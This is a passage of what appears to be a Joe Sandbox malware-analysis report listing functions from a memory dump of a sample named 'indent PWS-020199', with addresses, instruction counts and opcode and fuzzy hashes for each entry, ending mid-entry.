                            Function 015307C3 Relevance: .1, Instructions: 114COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 882b3e2bb5f1aaeaa8fb5227540d35d010ac110944f7f9b270bc52497b193fd0
                            • Instruction ID: df7081f1b51a5160f8b8823b2d27b4d04b9cf392ff92d3aa821613777a3a13b3
                            • Opcode Fuzzy Hash: 882b3e2bb5f1aaeaa8fb5227540d35d010ac110944f7f9b270bc52497b193fd0
                            • Instruction Fuzzy Hash: 19418CB25043419FD720DF29C844B9BBBE8FF98664F404A2EF5A8DB291D7709904CB92
                            Function 014A80A0 Relevance: .1, Instructions: 111COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 634bb28c4a9080652c91686a188394e313146d6190dde2d75df43e1b165c948b
                            • Instruction ID: d6d98750c9ce7f1d2e14774ba121fe4d84a2830896fc4c5ef8c83a7e2c43d915
                            • Opcode Fuzzy Hash: 634bb28c4a9080652c91686a188394e313146d6190dde2d75df43e1b165c948b
                            • Instruction Fuzzy Hash: 8841F671A055179FCB01DF59C880AA9B7B1FF74761F55822BD815A72A0DB30FD428BD0
                            Function 015305A7 Relevance: .1, Instructions: 111COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 81775bcc6230d96f680ad0c0e07a4352cc5bdd4c76c13dc190940a699e814465
                            • Instruction ID: eea155453c0594f62a31ce23daffacc86061a13a13e31ea98d4604d57b87ad1a
                            • Opcode Fuzzy Hash: 81775bcc6230d96f680ad0c0e07a4352cc5bdd4c76c13dc190940a699e814465
                            • Instruction Fuzzy Hash: FA41BF726047429FD321DF69C840A6EB7E9BFD8700F144A2EF9949B690E730E905C7A6
                            Function 014B4859 Relevance: .1, Instructions: 111COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7bb2c298263b069734bf4f38d4311bff6a25e5781d76ac4192865d561729995b
                            • Instruction ID: 412e586c862ffb9b7399bcdf5208924652e0b9e8829c6c376b413afeda2e1ee5
                            • Opcode Fuzzy Hash: 7bb2c298263b069734bf4f38d4311bff6a25e5781d76ac4192865d561729995b
                            • Instruction Fuzzy Hash: D941B1302003019BD725DF29D884B6BBBE5AF90750F18442EE6568B3B2DB70D855CB61
                            Function 014A8B50 Relevance: .1, Instructions: 111COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 10f5f0c83505a635b783361741fb6087f9b7da836b102462a27fb598f6909609
                            • Instruction ID: ccaa4833b569f3e35b5e1e3db0a4af6f05982f28a16254814bfb2ca1e34fd8ea
                            • Opcode Fuzzy Hash: 10f5f0c83505a635b783361741fb6087f9b7da836b102462a27fb598f6909609
                            • Instruction Fuzzy Hash: 61418CB1A01206CFCB15CF69C98099DBBF1FFA8221B55862FD566A72B0DB30A9018F40
                            Function 014C02E1 Relevance: .1, Instructions: 106COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                            • Instruction ID: 507d2dfbdf8dcf0e3e5e3fce6fbe9bb670eb388c9f922aeabcb58effc63ce9ca
                            • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                            • Instruction Fuzzy Hash: 54310439A04245EBDB528B69CC84BDBBBE8AF54750F0441ABF415DB362C7749844CBA0
                            Function 0155E3DB Relevance: .1, Instructions: 105COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0629dafa43cbd7cbfe8a99619c9559a6f9447a23b9d7c2b5410b0b36fd3fa064
                            • Instruction ID: c68f0d4a8bf5047e691bed359d58786cdb348bc3f1f0b173510e16c30eab1bef
                            • Opcode Fuzzy Hash: 0629dafa43cbd7cbfe8a99619c9559a6f9447a23b9d7c2b5410b0b36fd3fa064
                            • Instruction Fuzzy Hash: 2131AA75740706EBDB229F558C51F6FBAA8FB58B50F01002EFA00AF291DAB4DD00C7A0
                            Function 01564B4B Relevance: .1, Instructions: 104COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b1592ffd6698be637ae4b21aaa2de8930c0005bb3e02587e8383aaf99c44308e
                            • Instruction ID: 123dd9031dd11102a4d4cc45b1797793cea82616acb9f64039b4564b93878b0f
                            • Opcode Fuzzy Hash: b1592ffd6698be637ae4b21aaa2de8930c0005bb3e02587e8383aaf99c44308e
                            • Instruction Fuzzy Hash: 2F31D4322052018FD721DF1DD890E2ABBE9FB80360F4A446EE9658F765DB30E844DBD1
                            Function 014B4260 Relevance: .1, Instructions: 102COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 60c908a732cc9169bb3e6601021a61a96f11b122e1da52fb10450594480567a1
                            • Instruction ID: cd32e53bc1695d58d8a7d5e41fb9a233e158dcfa04ac927558645c0de84c2b8b
                            • Opcode Fuzzy Hash: 60c908a732cc9169bb3e6601021a61a96f11b122e1da52fb10450594480567a1
                            • Instruction Fuzzy Hash: 1F41D171200705DFD722DF28C880FDA7BE4BF55710F18842EE6AA8B2A1C770E845CB60
                            Function 01564BB0 Relevance: .1, Instructions: 101COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0753d762af869ed6307a1119823acd8ea7af4befc70577c2806a4bcbb8641c41
                            • Instruction ID: 219c28dc1655a5d4198cf1347ef4cbb64128424c8d3105a7ecaaf2482d9f7ab6
                            • Opcode Fuzzy Hash: 0753d762af869ed6307a1119823acd8ea7af4befc70577c2806a4bcbb8641c41
                            • Instruction Fuzzy Hash: B4318F716042018FE720DF29C890E2ABBE9FB84750F0A496DF9659F795E730EC04DB91
                            Function 0152EB1D Relevance: .1, Instructions: 100COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a3d5b8555cecad70755434b3b47d2bf333a5ad2142742c7f50c9f9f79181b0b6
                            • Instruction ID: 92a1fe4866dac4facea1c8a635d9c3df0ee44851ddc5d835cbe8eb9df2e8835a
                            • Opcode Fuzzy Hash: a3d5b8555cecad70755434b3b47d2bf333a5ad2142742c7f50c9f9f79181b0b6
                            • Instruction Fuzzy Hash: 0D31D4336016A29BF3229B9DC949B697BD8FB56B44F1D00A4EA459F6E1DB38D841C220
                            Function 015761C3 Relevance: .1, Instructions: 97COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d420823ada81aa5ff699fd86e66ef4d94daa2b18c776a827efd6eea7d17b8848
                            • Instruction ID: b444856efcb3afc6b8849738e260df317897d9e8642fb612780ff0490b3e5836
                            • Opcode Fuzzy Hash: d420823ada81aa5ff699fd86e66ef4d94daa2b18c776a827efd6eea7d17b8848
                            • Instruction Fuzzy Hash: 6031EF76A0061AABEB15DF98CC41BAEB7B9FB48B40F454169E900EF254D770ED00CBA4
                            Function 0155483A Relevance: .1, Instructions: 96COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5e6a6e0f00d3e40ba6f40e8dbfd5cfc1e5ff04b0ad0ae78b9ac6013209b59f6d
                            • Instruction ID: 36c8736331c32b8240f4238edbbbed2807408fd718199e3515d1d96308fa7e70
                            • Opcode Fuzzy Hash: 5e6a6e0f00d3e40ba6f40e8dbfd5cfc1e5ff04b0ad0ae78b9ac6013209b59f6d
                            • Instruction Fuzzy Hash: 40318776A4012DABCF61DF55DC84BDE7BB9BB98310F1000A6E908A7260DB30DE91CF90
                            Function 014DEB20 Relevance: .1, Instructions: 96COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dd85e5ce83020affcfef7b42921ffffce984d8aae5ac4891ad873501d353572d
                            • Instruction ID: 3bd9522021c5c743b7e936f0340e79e1240932fc6bd243a58607b7fad666238c
                            • Opcode Fuzzy Hash: dd85e5ce83020affcfef7b42921ffffce984d8aae5ac4891ad873501d353572d
                            • Instruction Fuzzy Hash: 3931B972E00215AFDF21DFA9CC40AAFB7F8EF54750F01442BE515EB260D6709E019BA0
                            Function 015760B8 Relevance: .1, Instructions: 95COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 916607cd3a4a56bae38221e2761aed78aa509ab269e3fa045be8378f24c4d85d
                            • Instruction ID: d81d264e7620a2bcacc94982002c0355dddd0fb2f4b8575fb3d4da1ce5fbb322
                            • Opcode Fuzzy Hash: 916607cd3a4a56bae38221e2761aed78aa509ab269e3fa045be8378f24c4d85d
                            • Instruction Fuzzy Hash: AD31E235B40A02EFEB129FAAE845A6EBBB9BB54754F00406EE505DF352DA70DC008B90
                            Function 014B07AF Relevance: .1, Instructions: 95COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 95559be6f0340a5be8263d094d064faa060e8b8badede29988900e382be853aa
                            • Instruction ID: 77359e30ae485adcf7962e23be4f215460a623fabf92c0f04d3b3782521b3818
                            • Opcode Fuzzy Hash: 95559be6f0340a5be8263d094d064faa060e8b8badede29988900e382be853aa
                            • Instruction Fuzzy Hash: E131C272A04612DBC712DE6988C0AABBBB5AFA4651F01452EFD55AB330DB30DD0287F1
                            Function 014B8550 Relevance: .1, Instructions: 94COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eca696fb1d96b4ce4b5218e269fdd02eea16379c6ea8ff4845a11a99696e4ddd
                            • Instruction ID: 48bf1cd5813f7cf08be5046dc89cb704ff0db9e8ee0c03525304b8802b78d68d
                            • Opcode Fuzzy Hash: eca696fb1d96b4ce4b5218e269fdd02eea16379c6ea8ff4845a11a99696e4ddd
                            • Instruction Fuzzy Hash: 513181716053028FE721CF19C840B5BBBE5FB98700F154A6EF9849B365D770E944CBA1
                            Function 014EA6C7 Relevance: .1, Instructions: 92COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                            • Instruction ID: 98ce1d0e44b87bed9815603be767ccee0e5862a7e30c08199dbdb7dadfde9c23
                            • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                            • Instruction Fuzzy Hash: 3B312DB2B00711AFD761CF69CD44B57BBF8BF19A50F14092EA59AC7761E670E900CB60
                            Function 0155EBD0 Relevance: .1, Instructions: 91COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e7ac7329e15c1cab7289ed2298a35c850160b311f2770dbbd24b14ed0a7fd325
                            • Instruction ID: e3cc07f001089ab2bfe4b748012c557ff4ebbdae8209206332635167424bd288
                            • Opcode Fuzzy Hash: e7ac7329e15c1cab7289ed2298a35c850160b311f2770dbbd24b14ed0a7fd325
                            • Instruction Fuzzy Hash: A931A971545311CFC711DF19C55185AFBF1FF99618F4449AEE888AF211D730DA44CB92
                            Function 014D438F Relevance: .1, Instructions: 89COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 27a73aed8291d896c095418ed25caa6d11c6b193c9f06451c24f4743a742b12d
                            • Instruction ID: f5f261eabcaf568b6d57ff2f5bec2513f602fcafd52ec8e588cb50361f9ae003
                            • Opcode Fuzzy Hash: 27a73aed8291d896c095418ed25caa6d11c6b193c9f06451c24f4743a742b12d
                            • Instruction Fuzzy Hash: 5431F631B002069FDF20DFA9C990A6E77F9BBA4704F08853BD115D7A64D730D985CB90
                            Function 014ACB7E Relevance: .1, Instructions: 89COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                            • Instruction ID: 2b785ae602ea395b3722df95624c556e73bf6f33cd65e5337a103566b48c5895
                            • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                            • Instruction Fuzzy Hash: A6210B36E4025A6ADB119BB98440BEFBBB5AF24740F0680369E15EB350E270C90087A0
                            Function 014AC156 Relevance: .1, Instructions: 88COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c103d0739bc4a98e0e2009d9e3daef551ddac6ca4e9ba4f18ab86acfcd58d14d
                            • Instruction ID: 36a6618a53757a087ead71d29634629b914b024c7cd3eae35afe7e9712c7a461
                            • Opcode Fuzzy Hash: c103d0739bc4a98e0e2009d9e3daef551ddac6ca4e9ba4f18ab86acfcd58d14d
                            • Instruction Fuzzy Hash: FA3149755003018BD722AFD8CC40BBD77B4BF60314F94816ED9469F3D2DA749986CB90
                            Function 0156C3CD Relevance: .1, Instructions: 88COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                            • Instruction ID: 13bc934ce80caa820fa68e92e5ec960b2a908d0a29bb514d2d5fd56085407ad3
                            • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                            • Instruction Fuzzy Hash: B021FD3660065366CB15EB958800EBABBB9FF90752F40841FFAD58F661E635D950C3E0
                            Function 014AE420 Relevance: .1, Instructions: 88COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 09ba03f34fbc535c18b054243fc4bffbe09bf398ce8cbc159764d172fef35481
                            • Instruction ID: 2a3325bb3e7447f9a36f3759487cbfb0cf77b8c25341051285b11c79ec1bccf2
                            • Opcode Fuzzy Hash: 09ba03f34fbc535c18b054243fc4bffbe09bf398ce8cbc159764d172fef35481
                            • Instruction Fuzzy Hash: 9431F632A0051C9BDB31DF19CC41FEE77B9AB35740F4201A6E655BB2A0D6749E818FA0
                            Function 014E4588 Relevance: .1, Instructions: 87COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                            • Instruction ID: 2d7c26e9799eb7191f5149758321c1ec6ce705230e14f7feabf1661fca77048b
                            • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                            • Instruction Fuzzy Hash: 1E21B431A00605EFCB10CF69C584A8EBBF5FF58311F14846AEE19DF250D678EA018F50
                            Function 014E44B0 Relevance: .1, Instructions: 87COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9df6a3d01f0cc6383aabb0c3ac7cfc97d33d2ea3ca18d615638cce44e8a90c84
                            • Instruction ID: eb91a967f66a786c9a2da6cc5bc17d6a3c836b1943ed7d7f34ffebe23f1b446b
                            • Opcode Fuzzy Hash: 9df6a3d01f0cc6383aabb0c3ac7cfc97d33d2ea3ca18d615638cce44e8a90c84
                            • Instruction Fuzzy Hash: 9721E132A047459BCB22CF19C884B6B77E4FF8CB61F09452EFE549B651C734E9018BA2
                            Function 014AE388 Relevance: .1, Instructions: 86COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                            • Instruction ID: a3ba2d5a48ec5eb84b8adf707fb9ef468b7329489ac20e1a673be970ee074289
                            • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                            • Instruction Fuzzy Hash: B531AD31600605EFE721CFA9C884F6AB7F9FF95354F1145AAE5129B2A1E770EE02CB50
                            Function 0152E609 Relevance: .1, Instructions: 86COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4ead0b7d1c1abf13b1f75a5c34bbcfe52261dd0cdf1e328f9c9c8cd17ffa1497
                            • Instruction ID: 1ee463600f0914b344b09664c9a9884655282ab24219a48744b6120be3f10f71
                            • Opcode Fuzzy Hash: 4ead0b7d1c1abf13b1f75a5c34bbcfe52261dd0cdf1e328f9c9c8cd17ffa1497
                            • Instruction Fuzzy Hash: 9B317C76A00216DFCB24CF58D885DAEBBB6FF85304B19445AE8099F391E771FA41CB90
                            Function 015306F1 Relevance: .1, Instructions: 79COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b21be251a846bc4253152ba9abfff22e647c121229d9e8fc0b8da554f75fffb3
                            • Instruction ID: 06942faf249d0da5f8104fdd9950dc948b55bb8657aa2cf93eaae229ee6b75f3
                            • Opcode Fuzzy Hash: b21be251a846bc4253152ba9abfff22e647c121229d9e8fc0b8da554f75fffb3
                            • Instruction Fuzzy Hash: 6A21917590022A9BCF21DF59C881ABEB7F4FF58740B55006AF541EB250D738AD42CBE1
                            Function 0153019F Relevance: .1, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e9514390e0a7036c02e63ea5536572ee98520ab7591460e870aa326de413d597
                            • Instruction ID: 5c431ac09d8f3a9310010269995b2ccea44b39298ccea7b477e7b653fc2e1d87
                            • Opcode Fuzzy Hash: e9514390e0a7036c02e63ea5536572ee98520ab7591460e870aa326de413d597
                            • Instruction Fuzzy Hash: EA218971600645AFD715DF6DC840E6AB7A8FF98B40F14406EF904DB6A1E634ED41CBA8
                            Function 01530283 Relevance: .1, Instructions: 74COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8cb7f4048bf491553b0bf77ada6e307e82b1a843be20d55a2a0c47430fd24833
                            • Instruction ID: 5de42b826a565b37fa705fab19b79242761c4350500d852c24c49842448d9698
                            • Opcode Fuzzy Hash: 8cb7f4048bf491553b0bf77ada6e307e82b1a843be20d55a2a0c47430fd24833
                            • Instruction Fuzzy Hash: E421B0729043469BD711EF6AC844BAFBBDCBFE1650F08445ABD80CB2A1D734D905C7A2
                            Function 014D2835 Relevance: .1, Instructions: 73COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b737da4cd0cefdf079022dff565140fbbead3b79d373f426e1e804a33d75ac11
                            • Instruction ID: 993abae159a7aa01d6433b280bcee4b21c522115dbdfb435237056b20e23eedc
                            • Opcode Fuzzy Hash: b737da4cd0cefdf079022dff565140fbbead3b79d373f426e1e804a33d75ac11
                            • Instruction Fuzzy Hash: 4921DA31645AC29BF723976D8C55F693B94BB41B74F180365F9209F6F2DBB8C8028250
                            Function 014EA30B Relevance: .1, Instructions: 70COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 03280c57cb61e32f9cc86a18a9fbfecedc8bc4fbad5f4e1b7e8b58e5058a01dc
                            • Instruction ID: a4b6751bf04146cad4e4c9fd10c4c3936691cd0e213af5fd42d0ef37748c5d90
                            • Opcode Fuzzy Hash: 03280c57cb61e32f9cc86a18a9fbfecedc8bc4fbad5f4e1b7e8b58e5058a01dc
                            • Instruction Fuzzy Hash: F621A93A240A119FC725DF2AC800B5AB7F5BF18B04F24846DE509CBB61E371E842CB94
                            Function 0156A49A Relevance: .1, Instructions: 70COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0318335c96599d132aeeded42f6ac355e6182acfdccc7ee2646599d5dfad4928
                            • Instruction ID: 3ff823e88f1c0c1b0eb3b5948bdeed875f9c36bcfae43cea51dcdfcd89a9f9d3
                            • Opcode Fuzzy Hash: 0318335c96599d132aeeded42f6ac355e6182acfdccc7ee2646599d5dfad4928
                            • Instruction Fuzzy Hash: F411E772380A127BE7229655AC41F6B769DABE4B60F51042DB708EF290EB70DC0187E5
                            Function 01530946 Relevance: .1, Instructions: 70COMMON
                            Download Yara Rule
                            Memory Dump Source
